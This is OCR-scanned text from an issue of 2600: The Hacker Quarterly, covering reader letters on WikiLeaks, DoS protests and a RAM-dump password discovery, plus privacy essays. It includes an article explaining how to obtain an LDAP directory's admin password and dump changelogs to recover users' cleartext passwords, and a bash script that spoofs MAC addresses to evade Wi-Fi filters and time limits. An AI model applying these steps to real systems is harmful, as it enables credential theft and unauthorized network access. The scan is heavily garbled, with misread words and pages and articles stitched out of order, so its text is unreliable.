temational subscriptions and make sure the enve-
lopes are sticky enough or consistently taped. They
should never be completely unsealed.
Dear 2600:
I am just looking for answers regarding the
proper title for the 2600 Hacker Quarterly.
Whicb is the proper title:
2600 Magazine: The Hacker Quarterly
{manthl{yearl
2600 Magazjne; The Hacker Quarterly
[month] [year] {volumeI [number]
2600: The Hacker Quarterly [month year]
2600: The Hacker Quarterly [month year]
{volume] [number]
or other title?
Ridlard
It's strange how you didn't include the one yo«
used ill your first semence before asking the ques -
tion . We have no preference with regard to month,
year, volume, and number [except that being a quar-
terly, we doll ~ ever use months in the first place} .
The extended title we're known by mostly is "2600;
The Hacker Qunrterly" bur we're also casually re-
[erred to as either "2600" or "The Hacker Quar-
terly ." lfyou refer 10 us if! the streets as "that hack-
er zlne," people tend to know what you 're talking
about, which is pretty damn cool. We now also have
the annual "Hacker Digest" (electronic) which 0J1ds
all sorts ofotherfun naming possibilities.
Dear 2600:
What is the strangest question received for the
2600 letters page?
Nice try, bur you're not even close.
Dear 2600:
This letter was inspired by The Prophet's
"The Telecom Informer" articles. Every time I
read them, I feel like I'm brought to a futuristic
world that's a cross between /984 and Akira. I
encourage readers to respond 10 thi s in the letters
of 2600 and spark debate.
We all love the growing pace of technol-
ogy that comes from China. My question to The
Prophet and readers of 2600 is: What are your
thoughts on the labor methods used to make some
of our beloved technology? It's no secret that
China has sometimes used questionable meth-
ods of labor in the manufacturing of technology
and other household items like clothing. Socially
conscious rappers like Vinnie paz and Immor-
tal Technique have sung about "slave labor." A
little while back, Apple was under fire regard-
ing the Chinese factories where iPods are made .
The fashion world has been under scrutiny for a
2600 Magazine
HW
It does sometimes keep us up III nights ,
Dear 2600:
Does 2600 take hacker fiction as well?
Matthew
Yes, we 've printed a number of hacker fiction
pieces in recent years. Simply send your submission
to arricles@2600.com and make sure to tell us it's
fiction as we can be extremely gullible.
Dear 2600:
I currently run a 2600 club in Brisbane.Austra-
lia. We've been active for a couple of years now.
I tried to get us listed a few times, but never got
a response besides the usual auto-response. I was
wondering why that was . I had my suspicions that
it was because we meet on a different day as the
rest of the clubs (we meet on the first Saturday of
every month at 7:30 pm because most of our mem-
bers live outside of the city and couldn't meet at
the usual lime) ,
Would that fact cause us to not be considered
an official 2600 club?
Haggis
This would most definitely be the reason for "'"
being listed. We should also take a momera to point
out that the meetings we have are not pan of any
club andthat attendees are fWI considered members
of anything. This also means thas no person can
"run" them , Anyone is allowed to attend and all
ages and backgrounds arewelcome. Ofcourse, any-
one can start their own club and impose conditions
for membership. WeJUS! ask that the above apply to
any meeting that has our name on it. Now, concern-
ing the day issue, this is how we 've done it since the
first meetings back in 1987. There have always been
people who couldn't make the first Friday, just as
there would be people who couldn ~ make other days
or times . But we've never heard oj a case where an
entire city was unable to attend on a Friday. Having
the meetings on the same day worldwide (the time is
completely open) makes it easy 10 remember what
day is "meeting day." We've invitedfeedback on al -
ternative ways to do this bur nothing has come ofit ,
We've gotten suggestionsfor the first Saturday, third
Thursday, and every Sunday. We think this would
be very confusing and almost impossible to list.
But there is one way to be as inclusive as possible.
Non-2600 meetings can happen anytime under any
conditions. Existing 2600 meetings can be used to
spread the word about these. Free adscan be taken
out in OUT magazine by subscribers 10 lei the world
know of these other gatherings . We're stili open to
suggestion on other ideas. But we think the system is
working about as well as it ever has.
Dear 2600;
I've been an international subscriber for sev-
eral years. Lately, I've noticed that the magazines
Page 42
Josbua
display in the lower right comer of the lens thaI
shows speed, altitude. GPS location, etc. If we
can put this much tech into snow goggles, can
you imagine thepossibilities available for the use
of this technology in other fields?
Assange 's motivations.
WikiLeaks' MO seems to be the old hacker
mantra of "information needs to be free," but the
way that Assange has made seemingly no attempt
to establish or protect his anonymity seems very
uri-hacker-ish. Instead, before his arrest, he was
jet-setting around, giving press interviews, seem-
ingly quite comfortable with his name and photo
appearing everywhere . Given the fact that some
of the countries wbose secrets he was spilling
have no problems with solving political inconve-
niences with. well-placed bullets, 1can't tell if he
was crazy or merely an incred ible egoist.
It'S also worth noting that the documents that
WikiLeaks released were not obtained by As-
sange himself, or other "hackers."
Rather, they were submitted by anonymous con-
tributors, and Assange and others decided which
ones were worth releasing. I can 't help but won-
der if perhaps Assange's long-range goal was
to make his name known, then use that name to
blackmaiJ companies and governments to keep
their information unreleased. It would be so easy
when the information is literally corning straight
to him. And who's to say that's not happening al-
ready?
I do think there was some value in releas -
ing the information that Wikil.eaks bas released.
However, the rock star way that Assange has
gone about it has left a decidedly bad taste in
my mouth , and, the validity of his sexual assault
cbarges aside, 1 must admit I'm kind of glad to
see him humbled a bit.
AnOIlYIPOUS
First , Q correction . We're not hosting a mirror,
but merely pointing wildleLJks2600.com to the actu-
al WildLeaJcs site, wherever thai mayhappen to be at
the moment. This became necessary when sites be-
gan to disappear as the behest ofcertain authorities.
As for your feelings on the personalities involved
in all of this , it's certainly not the first time we 've
heard these opinions. But, in the end, the real issue
is whether having the ability to release such docu-
ments makes the world a better place . The motives of
people's involvement can always be questioned, but
if the organization itself is ultimately doing some -
thing positive, then it should be supported, period.
It's especially disturbing to see other organizations
purporting to 00 similar things tearing down each
other's efforts. Freedom of information is not a
competition, nor an exclusive possession. It all/ails
apart when disun ity dominates.
Dear 2600:
I appreciate you proposing alternatives to
the DoS attacks in support of WikiLea.ks. In my
mind , the attack s were meant 10 stick a proverbial
middle finger in the air at Amazon, MasterCard,
Visa, PayPal , and the like. As such, 1also appreci-
ate the individuals who committed the attacks and
the many who lent their computer cycles to ac-
complish the same . I am terribly conflicted about
Page 44
this issue because the rational side of me agrees
that the backlash by stupid people in power will
be disproportionate to whatever actual banns
took place , while the tech nerd in me just wants
to say damn the man and damn the consequences.
I hope other members of the hacker community
get the chance to voice reasoned opinions about
all parts of this affair. Sadly, reasoned discussion
rarely grabs headlines.
Stephen
Consider that the net is set up in such a way
where anyone with sufficient access can take OOwn
Their enemies and that the people doing this will not
always be on your side . By somehow equati ng hack-
ing with raking down a site , we tum hackers into
weapons of one side or another. Our hackers take
down their sites, their hackers take down ours . Not
reall y what we signed up for.Instead, let 's try getting
the word ofwhat we're all about into more places so
that the authorities feel compelled to restrict things
in order to keep othersfrom hearing what we have to
say. Recent events worldwide have shown thai shut-
ting off access isn 't a very popular move in the eyes
of the people. Let 's not become the ones wJw00 that ,
even when the message is offensive to us . Sometimes
it's more effe ctive to let your opponent speak OUI and
show their true colors.
Dear 26()():
Listen .
We the people , who support Wikil.eaks. are
on the defensive.
The other side (the organizations illegally
harassing W1kiLeaks - also known as "the Evil
Empire") have already made clear they have no
morals .
The only thing the Empire fears is leaks com-
ing from within their own iUegal investigations.
Let 's hack, or demonstrate, or use any other
strategy, to target these organizations for leaks!
In this way, our Internet can become stronger
than their Empire.
B. Franklin
Well, somebody had to say it .
Wanted
Dear 2600:
I'm surprised that your latest issue isn't buzz-
ing about this so-called "Anti-Counterfeiting
Trade Agreement ." Not merely because it in-
volves ISPs and even countries upping their secu-
rity and enforcing firewalls , but because this sort
of thing is extremely unconstitutional . The reason
this is in binary is because they probably have
DPls and packet sniffers running for this sort
of discussion. ACfA is kind of supposed to be
a secret so shhhhb! What I really want to know,
though, is this . Did you guys really not know
about it , or did Big Brother tape your mouth shut
about it? I would strongly encourage you to at
least put an article out about it. Our community is
a strong community, and one that could do some
2600 Magazine
real good against it. Not that I'm for piracy, as
I'm not, but this is more than personal matters.
This is about freedom, and isn't thai what hack-
ing is about ? Freedom to do whatever you want?
hjdn shadows
" Whatever you want " might be a bit much for
most to handle, but the ACTA threat is definitely
one we should all be aware of. We would certainly
devote a good deal of space to an art icle that ad-
dressed its dangers and how hackers might fit in
with the fight aga inst it . This is precisely why we
need informed people to write det ailed pieces from
a perspective we can ail identify with. There are so
many topics to cover in our pages and we all have
our own unique experiences andfields of expertise.
So consider this a calljor something that addresses
this head And yes, you did send us this letter
in hex which made it stand out like a sore thumb.
We trust you don't really believe that will somehow
shield you from prying eyes,
Dear 2600:
As a Jewish mother, I am going to appeal to
your sense of duty! I know, thi s sounds ridicu-
lous. However, "read" me out. You can check me
out (obviously) normal parent , sane etc .• etc . I
would like you to do me an enormous favor , even
though you don't know me . My daughter is dat-
ing a guy that my husband and 1 are, to say the
least , not too keen about. There are many reasons,
however.I would just like to know if he did or did
not graduate. I know this sounds silly, however, I
want to know if he is lyingl lf he is, then there are
other things that would make sense . In the mean-
time, here is his information:
[Name, Age, Home Address, College deleted]
1 have tried calling the school, however, they
will not give me the information, even when I lied
and said I was a prospective employer. I hope you
don't fallon the floor laughing at this . My hus-
band told me about your magazine. Of course, 1
am just able to use the computer for email etc.
without throwing it on the floor when 1 cannot
find something, so I seriously admire computer
freaks , not that you are one! Please help me with
this little task. 1am sure it will take you less than
a minute. I would be more than happy to make a
contribution ,
Worried Mother
We don't 00 this sort of thing for hire or to reach
these kinds oj conclusions. It's not that hard to jin.d
out if someone graduated from a college. A look at
their yearbook would quickly answer that question
and many colleges post that info on their websites.
Bur even jin.ding this out is not likely to change your
[eelings about this person. Continuing to try and
convillCe your daughter that he 's no good will likely
only make their bond strong er. Instead, you should
be supportive of her and there to listen if she has
any doubt s or uncertainties about where this is all
going. That is how you can really help. You should
also seriously cons ider that you might be wrong .
Spring 2011
You're likely to beable to do a whol e 10/ more good
if the people you care about aren 't dri ven away by
this sort of disagreement .
We trust this wasn't the kind of response you ex-
pected from the hacker community. The fa ct is that
these types of issues aren't solved by the kinds of
actions you see on a second rate TV show, but more
so by the kinds of comments you see in a second rat e
advice column .
Discoveries
Dear 2600:
1 recently let my girlfriend into the wonder-
ful world of hacking. 1 helped clear up some of
the discrepancies in nomenclature and media por-
trayal, and pointed to the rich history of program-
mers and tinkerers that embody the hacking spir-
it. A few weeks later , she was doing research and
I showed her how to view source in the browser
and find embedded PDFs for download and of-
fline use. She was hooked .
Just recently, I received this email from her :
"I am a hacker! When my mom and Lindsay ar-
rived in Florida, they discovered that the cable
box in my mom's house was not working. So ,
they went to TIme Warner and picked up a new
one. Last night , we decided to watch Sex and
the City 2 (horrible decision). However, our
plans were thwarted when we realized that my
morn's old password which allowed her to order
"on demand" movies no longer worked with the
new cable box , Inspired by your ability to out-
smart technological devices, I auempted to crack
the code. After two tries, success! The code was
"0000" - not the most difficult combo to guess .
But , 1guessed it nonetheless and felt empowered.
Thought you might get a kick out of that. I did."
I thought you guys might get a kick of it, too.
The Cisco Kid
Sure , we could say that all they had to do was
call the cable company to get the info they were
obviously entitled to, but that would be missing the
point, It is indeed that feeling of empowerment one
gets when a system or policy is outsmarted that is
so contagious to all of us. Thi s is how one learns to
embrace the hacker spirit. No textbook or classroom
could ever come close.
Dear 2600:
First I'd like to say that I'm a new subscriber
and love the magazine. Especially the letters sec-
tion, which is why I've decided to write in and
share a past experience that to this day still pisses
me off .
About a year ago , while working on a degree
in information security, 1 took a class in digital
forens ics . The class was started as an introduction
to a new forensi cs program the school was pre-
paring to offer and was taught by one of the secu-
rity instructors. During the course, we discussed
RAM acquisition and how a wealth of informa-
tion could be found sitting in memory, especially
Page 45
passwords . We merely discussed this and didn't
go much into it in class, but the subject piqued my
interest and I decided to do what my instructor
likes to call "discovery learning.") found a com-
mand line application that dumped the contents
of RAMinto a text file for analysis. I logged into
one of the computers and accessed a few online
accounts including my email, and an applica-
tion we used called TestOut. In case anyone is
not familiar, TestOut is basically video course-
ware to help people prepare for certification ex-
ams, such as Securiry«, Network-s, CCNA, etc.
Some classes used TestOut as supplemental ma-
terial for the course. Anyhow, I logged into the
different accounts (which were mine) and then
dumped the RAM into a text file so I could see
what passwords) could find in clear text. When I
found my TestOut password.I noticed that there
were other user names and passwords related to
TestOut sitting in the memory dump. Lo and be-
hold, they were the user names and passwords
for all of the instructors who used TestOut in
their classes, as well as the passwords for default
accounts the school used to administer TestOut,
all in a nice XML format.
I decided to "do the right thing" and, the
next time I saw my instructor, I told him about
the problem. The first words to come out of Dis
mouth were "Sounds like you've been hacking."
While normally I would say yeah, it was clear
what be meant by that . He ended up imaging the
hard drive from thecomputer I used to examine
it for any hacking tools. I was threatened with
possible expulsion and prosecution. All this af-
ter I showed him 00 two other machines exactly
what I did and how the results are the same no
matter what machine you run TestOut on.
Basically, TestOut would request your login
information and instead of sending a hash to the
server to authenticate, the server would send the
login credentials back to the client and authen-
ticate locally ... leaving all of this information in
RAMin plain text. I can't quite grasp why they
did this, but it was pretty-stupid .
Back [0 my story. In the end . I was " found
innocent" of any wrongdoing, and didn't get into
any actual trouble. However, the whole th.ing
still bugs the hell out of me. I found a vulner-
ability, didn't use the information for my own
personal gain, and reported it so that hopefully
the problem could be fixed. And what I got in
return were threats. I'd also like to point out that
this instructor took full cred it for finding the vul-
nerability, and to this day has everyone else on
campus thinking that I'm some kind of scheming
hacker who's up to no good. While I do consider
myself a hacker, his definition is qu ite different
than mine. By the way, thi s particular instructor
is not only a security instructor, but is apparently
Page 46
a CEH and teaching the "hacking" class for the
security program! WTF!
Well, thanks for the opportunity to vent. I'm
glad to have found a community that I can relate
to and that is willing to listen . Most of my friends
that I talk to about this kind of stuff have no clue
about what I'm saying and certainly no interest.
Anonymous
You certainly have our interest and sympathy.
Thisstory is , unfortunately, a rather typical one .
But it serves to emphasize how the so-called ex-
perts oftentimes have no clue. Be contens having
the truth and the skill on your side and don 't let
this discourage you from continuing to be open
and honest in what you discover. That is the true
hacker spirit.
Grammo.r Words
Dear 26()():
I have a question: "Besides the inordinate re-
sponse to something as trivial as poor grammar
- ' What is it that will truly outrage or even stir
anyone today?' ''
I remember growing up hearing this wonder-
fully clever saying: "The pen is mightier than
the sword." What is it that would stir the people
of today ? What could be written or shown that
would knock people out of their recliners? We
seem to live in a world where our fellows are in
a schizophrenic state • inappropriately respond-
ing to the infuriating with ambivalence - and
clamoring about something that is so meaning-
less like baseball. How many people have heard
about Wikil.eaks for example andean settle into
their casual living room-based existence and post
responses to a "3 Second Video" on YouTube?
Then afterwards - becoming for example - tem-
porary armchair grammarians? Anyone irritated
at all? I am... Analyze that ?
I often wonder if I am ju st overreacting.
kylew
Dear 2600.-
I am silting here read ing your grammar re-
sponse in 27 : I , and laughing out loud . I think
that if a spelling/grammar teacher read that short
paragraph, they would have a coronary. Bravo!
drlecter
Dear 2600:
I am acutely embarrassed to admit that my
message excoriating Adam for his misunder-
standing of the basic grammatical rules regard-
ing agreement in number of the subject and pred-
icate of a sentence included a glaring example of
disagreement in number of the SUbject and the
predicate of a sentence .
The sentence, in pertinent part , should have
been written: "the members of the 2600 staff are
..."; or, "the 2600 staff is .." (which is correct, but
ugly); or, "the 2600 staff members are ..",
2600 Magazine
Note that the period terminating the previous
sentence is correctly placed because the quoted
phrase ends with an ellipsis .
RWM
Moving on.
Advice
Dear 26()():
My message for every hacker out there is to
change your passwords as often as possible. No,
not just so that you won 't be hacked, but because
it helps to improve memory and learning ability
in the long term, as do most forms of curiosity,
exploration, and so on . Change your passwords
constantly, and keep different sites ' passwords
distinct. No inaner how hard it seems to do, you
can do it. You are a Hacker.
Jane Doe
And with that , a career of hacker motivation-
al speaking is launched.
byaestetix
I've been hearing a lot of discussion on how
we're losing privacy. Maybe it comes from the
anti-Facebook pundits who are upset about their
settings, or the anti-TSA travelers who don 't
want to be searched, or security types decrying
storing lots of personal information in the cloud.
However, I think they're forgetting the questions
we should really be asking: What is privacy?
And if it' s a guard to protect evil people from our
personal information, what is the actual informa-
tion they 're trying to get?
Throwing the tinfoil hat aside for a moment,
let's look at Internet security in general. Almost
Spring 2011
Dear 2600 :
Geek Squad is still on the loose ! I read the
back issue (25:2) article on the Geek Squad's
lousy security. Even the most uneducated hack-
er could eas ily gain access to the ent ire Geek
Squad's customer info database with a simple
key logger and some basic social engineering.
The Geek Squad has not changed their ways -
they still use passwords when on house calls
and they open all their customers to having their
credit card numbers stolen.
I am currently trying to educate all the people
I know through my small tech repair business.
I provide a safe and secure style of fixing com-
puter issues where customers don't have to enter
any kind of personal data. I want to encourage all
readers of 2600 to spread the word about Geek
Squad's security hole and to encourage others to
turn to more secure ways of fixing their tecbnol-
ogy.
every kind of hack or attack involves imperson-
ating another person, or trying to fool a system
into thinking you should have more access.
Some attacks trick a system into running code
performing higher level tasks ; others involve
assuming the identify, often by cookies or session
variables, of someone else. Many lines ofdefense
come along against these attacks: stack protection
built into compilers, flags on cookies limiting who
can access them, and filters designed to constrain
what data a system will allow. All of these boil
down into different archetypes surrounding how
an ideal system should operate.
Now transpose these ideas into meatspace,
Rather than relying on technical means, we have
Page 47
II
j
j
look at any custom utilities that do work on the
directory, like those that add or delete users. The
password will sometimes be embedded within, or
referenced to an external tile 00 the same system.
Look through the script for the looooong command
lines and you'll usually find the God account and
its password as arguments to that LDAP command.
Now that you have the usernarne and pass-
word for the God account , you should look for
the changelog dump script. Search your directory
system for a Perl script with the word "dump" in
it. One possible name is "cl-dump.pl", Alterna-
tively, use ftp to get the script from the directory
server. Search the usual directories for it (/usr/bin,
lusrllocaVbin, etc.), because it could be in different
places depending on the distribution.
If all else fails, do a search for "changelog
dump script" ooline.
Here's a common usage of a typical dump
script. Your options, of course, may be different.
Execute the script without any arguments to get the
proper usage. Change to the directory that contains
the script, then:
s . /durnpscr i p t name. p,
-. -h 'IP address of LOAP serve r]
-. - 0 manager"
-. - w :directory manager pa ssword]
-. -0
In tbis example, the change log output will
be written to the file "/rmp/outputfi le.txt", Once
the script completes, use your favorite text tool to
scroll through the f Ie.
10particular, scan for lines that look like this:
unhaahed#user#password: rald3rs
Even on the most insecure operating systems,
you never see the actual password in clear text,
only the bashes. But once you decode the change-
log with the appropriate script, there's nothing left
to the imaginatioo. The output is quite easy to read;
I don't have to explain further.
For security, directory admins should consider
removing or otherwise disabling the cbangelog
dump script ifpresenl. Beware : if the LDAPsystem
admini strator is worth his salt, your activity will be
logged and logs checked, but that's a big "if."
Be careful out there.
Shouts out to TomzilJa, Gman, and PRW.
---------Page49
Warning:"Fishing for user passwords can gel
you in big trouble. This article is providedfor secu-
rity and educational purposes only.
Lightweight Directory Access Protocol
(LOAP) directory servers are everywhere. From
proprietary directories like Microsoft Active
Directory and SunONE, to open source projects
like Fedora Directory Server and OpenDS, there's
no shortage of choices.
One advantage of single-point user manage-
ment in an LDAP directory is that you can enforce
a global password policy. For instance, you can
make all users pick a password of at least six char-
acters, with at least one numeric character, one
uppercase alpha character, and so forth. Also, you
can force the user to change their password regu-
larly (say every 45 days).
If you think about it, to check password features
like this, the LDAP directory must be able to check
the plain text password the user has typed. Makes
sense, ri ght? In order to enforce at least one digit,
for instance, the directory has 10 be able to process
the unencrypted password . Whether it travels over
the network in the clear or through SSL encryption
is moot. When it gets to the directory server, but
before being written to the directory as a hash, the
user 's password is in the clear.
So far so good. But changes 10 the LDAP direc-
tory, even when a user changes their password, are
usually written to change logs. Change logs are
necessary for things like directory replication, as
most directory installations have more than one
LDAP server, for redundancy. As I found out quite
by accident, you can recover the clear text pass-
words the users have typed by dumping the change
log with utilities that are oh-so-conveniently
included with the directory software.
All you need is the ability to connect to the
directory server over IP, the dump script, and the
password of the God account. Well, that's what [
call it but it is analogous to the root account on a
"nix server. It can be something like cneroot, or
cn=directory manager, or cn=administrator.
In my experience, there's not much security
around this ID and password. For starters, you can
Spring 2011
II WAP DirectoryServers:
TMI!
by Leviathan
no way to tell how long they've been there . In
fact, many ofthese perceived "threats" have been
around since 1951, or even 1851, but because
we were not able to detect them, we didn't know
about them, and weren't scared of them.
There's a famous book with a tagline that
includes "ignorance is strength." I'd actually
suggest it's not far from the truth. When people
are designing the perfect computer or the most
secure system, they often forget that perfection is
an illusion and paradox at best, a lesson Asimov
taught us decades ago. If I can google sorneone 's
name and discover an essay they wrote years ago,
is that essay part of their identity? The answer is
yes, but it's questionable how much of an influ-
ence it has on their personality now. Realistically,
all these bits of information are tendrils forming a
suggestion of who someone probably is.
Communication theory in general is based on
threeprecepts: my ability to formulate in words or
actions an idea I have, my ability to communicate
it to you, and your ability to take my words and
actions and interpret their meaning. Nobody can
fully know someone else's thoughts, but they can
attempt to piece together intention based on their
own interpretations. When dealing with mass
communications, this becomes much more diffi-
cult. Rather than a local town or village, our envi-
ronments have merged together in a way that, if1
want, I can make the strife of someone in another
state or country my problem. When we pull more
people into the picture, do I have to change what
1 feel my identity is? A larger global community
means more words, actions, and events, which
drastically changes how we define ourselves.
How will this play out in the future? Again,
I'm pretty sure nobody bas a sweet clue. I do
believe it's futile to try to maintain the "old
ways," and I think this is a good thing. Perhaps
if we're forced to see that everyone is imperfect,
we'll also eventually be forced to accept it and
adjust our worldviews accordingly. On the other
hand, it's also quite scary, because we all freak
out at the unknowns. There is also the unfortunate
possible of a digital hegemony of information,
husbanded by large groups which became large
because of the trust we placed in them.
While 1feel the best approach is to experiment
and be open-minded to whatever the world may
bring, I'd also advise caution. Bear in mind that
these devices are tools, and we should think about
how they could be used, not in terms of good and
evil , but rather as means by which to expand or
contract our freedoms. And remember that while
tools are objects of manipulation, people are (in
theory) thinking, emotional, creative beings, and
we can use tools to craft a more perfect world.
2600 Magazine
to look at how people work. We all live through
habits, usually going to school or work at a set
time, hitting the same few places for lunch, and
maintaining the same generalized set of inter-
ests . If you study the patterns of someone else,
it's often easy to either predict where they will be
on a given date and time, or fall into their tracks
ahead of them. Because we want to maintain a
common good in general, such as making sure
people have jobs, children have education, hospi-
tals help people, etc., we try to work with these
patterns. When someone falls outside of them, it
arouses suspicion and we might throw up alarms
until we've concluded they are safe.
While I think the American founding fathers
set up our government system specifically to
prevent paranoid overreactions, I want to stop
that tangent and focus on the more important
thesis : all of these topics dance around an inner
core of identity, that which composes who we are.
What is our identity? What are the vital pieces
of information that an evildoer could grab and
become us for a day? I think that's at the heart
of all this scare, and my opinion is that, in all
honesty, none of us has a clue.
I was involved in the RPID tracking badge
deployment at the two most recent HOPE confer-
ences, and we learned a lot about bow people
think. One of the goals we had was to see how
much personal information people would give
us if we promised cool visuals and fun statistics.
The results were astonishing: an overwhelming
majority handed over "sensitive" information
like their phone numbers and zip codes of their
home town. People happily filled out forms we
didn't even require. Further, we carefully made
the badge with a removable battery so people
could wander the conference incognito, but
when we ran out of "populated" badges, many
complained and demanded that they get the cool
techie badges ... so we could track them?
Do I believe that the data on the badge
compose each person's entire identity? Of course
not, Do I think that someone could have spoofed
their badge to look like someone else? Yep, and in
fact some people did. However, with the limited
amount of information on the badge, in many
cases it was possible to infer who it was. Infor-
mation like "they hang around this area" or "they
have attended these talks" adds significant clout
to learning more about who people are.
So how does this all play into modem day
security? Is it true that one tiny piece of infor-
mation could rapidly shape the public view of a
given issue? Absolutely. But hasn't it always been
that way? Hard to say. I think the real difference
between 20 II and 1951 is in how much tech-
nology we have, and how we use it. This comes
with an added cost: the more anomalies we can
detect, the more we do detect, and there's often
Page48
-------------------PageSl
I/!I
\
'I
\
Important Update
Last October, the German journal Lima-Magarin
publisbed an ankle widt Perl liOiplS which OpclU
Wi-Ficonnections thai have a splash pagewithadver·
tising and terms of usc. The article and cod.: can be
(ound at: http://'''''''''''I .linux- magazin.de /
--Heft-Abo/Ausgaben/ 2 01 0/11 / Schlues
- s eldi enst and can be translated via GoogIc.
A combination of my Bashscrip( and these Perl
scripts would automaticallyconnecllO free Wj·Fi and
e$lablish c.bc Inlernet aoccss without a splash page,
advertising., or eermsof \JSIe.
A
t
tic Usage of Free Wi.. Fi
u oma If ifcooiig then shows !hat we goe an !P, the
by Rotf ncxt step is cbecking tile DNSserver with rwo DNS
rcquesu.. If at lease OIIC ONS lookup was S\lOClCSSfuJ,
the nc;J;t step is downloading two simple files, e. g., 3
small Google logo. If al least one file could be down-
loaded. weshould be online.
This connection is being tested in a loop every ten
SCICOnds. If the connection gets lost, gothe next open
Wi·Fi and test it, If there is 00 next, continue with
the previous MACrandomizarionin thisendless loop.
The MAC randomization is also good for free
Wi·Fis with a lime limit, because the lime limil
usually is based on the MAC.
The scripI ki lis the network manager 10 avoid
double \ISIIge of 8 resource wh ich can't do thac. For
the same reason il has a locldile function10 llSSUJ"l: thai
the script terminates i( 8 process with c.be same name
set a lockfilebefore and is still running.
I tested c.be scrip] in several shopping centers,
public places, and railway stations and ie works.
The script and a description are at

--.com/homepaqe/ proJects/wifi/index .
-heml
For users wbo can't use Bashscripts, I made USB
keys with Knoppix Linux.. where the auto-connect
script gets started by a boot script;
het ps : I/ ssls ites .de/www. true-random
" . com/ homepage/projects/wifi/stick_e
" . html
The aUIO connect script bere has an additional
endless loop over all Wj·Fi devices, so Wac ie ....orks
with hoi plugging; you can add or remove Wi·Fi
devices without problems. The script and Ihe Knoppix
does 001 store any files, so surfing with this key Iell ves
no traces.
A gallery with this USB key in action is here:
https:// ssl sites.de/www.true-random
- .com/homepage/projects/wifi/
"'gall eriee. html
One application there is downloading wilh a note-
book in a closed briefcase, so thai no one can sec that
Wi-Fi is used. It's easy 10 bide \be fact that you are
using a free Wi-Fi even when someone sees that you
must be: online: You can simply plug B wireless USB
modem and 53Y thai you are online with HSDPA.
UMTS, GSM, GPRS, or EDGE but Dol Wi-Fi. The
gallery also shows sucb Wi-Fi." With one
finger close to the powerOurton or magic system key
reques\, and with the randomized MAC, this is really
safe.
Using free Wi-Fi is good for going onliDe for
free, reading eraails and news, and doing other thiop
....henyou are far away fromhorneor your computer al
school or work. It's also good as a backupconnection,
when your own Internet connection is down.
BUI it's nOI easy: You have co go 10 a shop like
Starbucks or MacDonaids (and buy something) or
you have to scan for open (unencrypted) Wi-Fi, try
10 connect, and test if you are ooline. And often you
can't connect because there is a MAC I1lter or you
are OUI of range, and many open Wi·Fi5 are offline
or require a payment for the Internet access. And
because one of about 30 Wi-Fis is free, iI's oRen
lime-conswning.
Microsoft Windows and the MacOS had as a
default setting \be auto-connect to open Wi-Fis. You
can still actiVllle this property, bUI il docs nol test if
the Wi-Fi is free (unencrypted, online, and without
barriers like a MAC filler). So the auto conneet from
the OS often does not get you online, because most
open Wi-Fis are not free, Another disadvantage of
the auto-connect fromthe OS is that it uses the hard-
MAC, bUI for privacy it's bcocr 10 use a random
MAC.
So I made a free Bash senpi, Iioenscd under
the GPL. which does not have this disadvantage
and works faster than a man could. This is the short
descriptioo: First, the Wi-Fi device name is the ooe
and only command liDe panlJDClcr. Than the MAC
gets randomizedby
ranes (cat /pt"oc/ interr ap t s I
.. md5surn)
MAC=OO: OS (SRANIXlM't61 : S(ran: \J : 2) :
-'Slran:J:2}:Slran :S:2} :Siran:?:2}
ifconfig ·SDEVICE" promisc
ifconfig hw ether $MAC
This does nOI work with every adapter. so you
should cbeck it, For maximumrange and noise imrnu-
nicy, the rate is set 10 I MbiI/s by
iwconfig "SDEVICE" rate 1M
The next step is scanning for Wi·Fis by
iwlist 'SDEVICE" s ca nn i ng
and parsing the ourput, The lisl of open Wi-Fis is
then sorted by qualify (sigpaJ strength) 10 get the best
possible connection. Then the script tries 10 connect
with the association
i wconfig 'SDEVICE" mode manag ed ap
.. 'S(APMACISloop_ count e r))'
... channe l 'SlCHANNELISloop_ccunt er
-il" e ssid "SlESSID( Sloop_counter
-] I"
and DHCPcooJigun.tioo
type -P dhcpcd
if IS? - e q 0 )
then • dhcpcd with 20 s t i meout
... (defaul t 60)
dhcpcd - t 20 'SDEVICE"
e lse dhclient which make s only
.. on e t ry to get a Le ase
dhcl ient -1 ·SD£VI Cr."
fi.
Spring 2011
.------
2600 Magazine
llaws of a system like this would be more widely
noticed ifil wasn't just related 10 computers .
1. The e-mail service provided by Gocgle is
widely popular. One panofGmail that some people
do nOI like is thaI advertisements are sent based on
yOUT email's content, Some find Ibis an invasion of
privacy.
TNsibuJlinn rvilJIota
Despite the fBcts, 501DC people think the
computer and Internet are private places. Let's
switch the computer with your home. You go about
your business in whal you think is the privacy of
your house but then recei ve advertisements based
on what you do there. After a few of these adver-
tisernents, you would probably get the feeling
that someone was spying 00 you. Now let's look
at the issue of a machine watcbing you. Instead of
a computer , let's say someone hid cameras inside
your bouse. From the feedback, the company
would choose wbat advertisements to send. It's
not a person watching you, so does that make it all
right? I say no. PIU3, every computer/machine bas
an operalor, so even if the initial data is recorded by
a computllr, there still could be somcone looking at
it later. I feel whal GoogJe does is a bil like spying
and I don'l think just because it is 00 the Internet it
sbould be treated any differeDt than spying in real
life.
I bope this aJ1icle shows bow mucb our view-
point can change if there is a computer involved.
Sometimes the non-computer counterpan is quite
simi lar 10 the situation involving a computer. Still,
people often look at the fWO situations completely
differently. If they thoUghl along the lines of this
asticle, maybe they could come up with more
reasonable solutions to the problems/debales
computers bring.
TIu Glib M'" wilh a
Peoplewho question lbis advertisemeol meLbod
at first sometimes change their mind once they bear
thai it is only a computer that ncads their email.
They feel safe knowing only a machine is going
through their mail and decide then: is 00 reason to
question it any longer.
TM sitatJlioIt 4f i1b 1101" with II co,.,.,ur:
J believe that maoy people who cod up using
the prognun wiJI not SIOC the harmful aspects. They
will probably sec it as a betterway to stop their kids
from entering certain websites, If the program gets
popular, schools andbusinesses wiUdo the same.
byDGM
In Freedom Downtime; Emmanuel Goldstein
talks of what Kevin Mitnick's crimes would be
wilbout a computer. I found this way of thinking
very interesting and would like to use it to examine
many other things in the computer-related world.
I. In an episode of Off The Hook, a type of
61t.cring program thai II:IeS "qui ItiDg" methods
Wllll discussecl This "quilting" method was saidto
edit out the inappropriatecontent on a page while
leaving the suitable content undisturbed, The possi-
biIilies of this type 0 f program being misused was
also discussed It was talked about bow someone
could block content without yOW" knowledge and
the power \0 do so oouJd be abused.
TM s:itu4Mfl without co"'PUlU1:
Let's switch the computer with a library. £1 '5 a
fair switcb considering they are both resources used
to learn new information. Now, say thai you go to
a library and cheek OUI a book only 10 find words
crossed out, Most people would go 10 a librarian
and ask wbat the problem is. Imagine if they told
you they decided to edit the books because they
found the content unsuitable. This library wouldn't
last too loog running like this. Besides, who is
going \0 take out a book thai reads: "Once upoo a
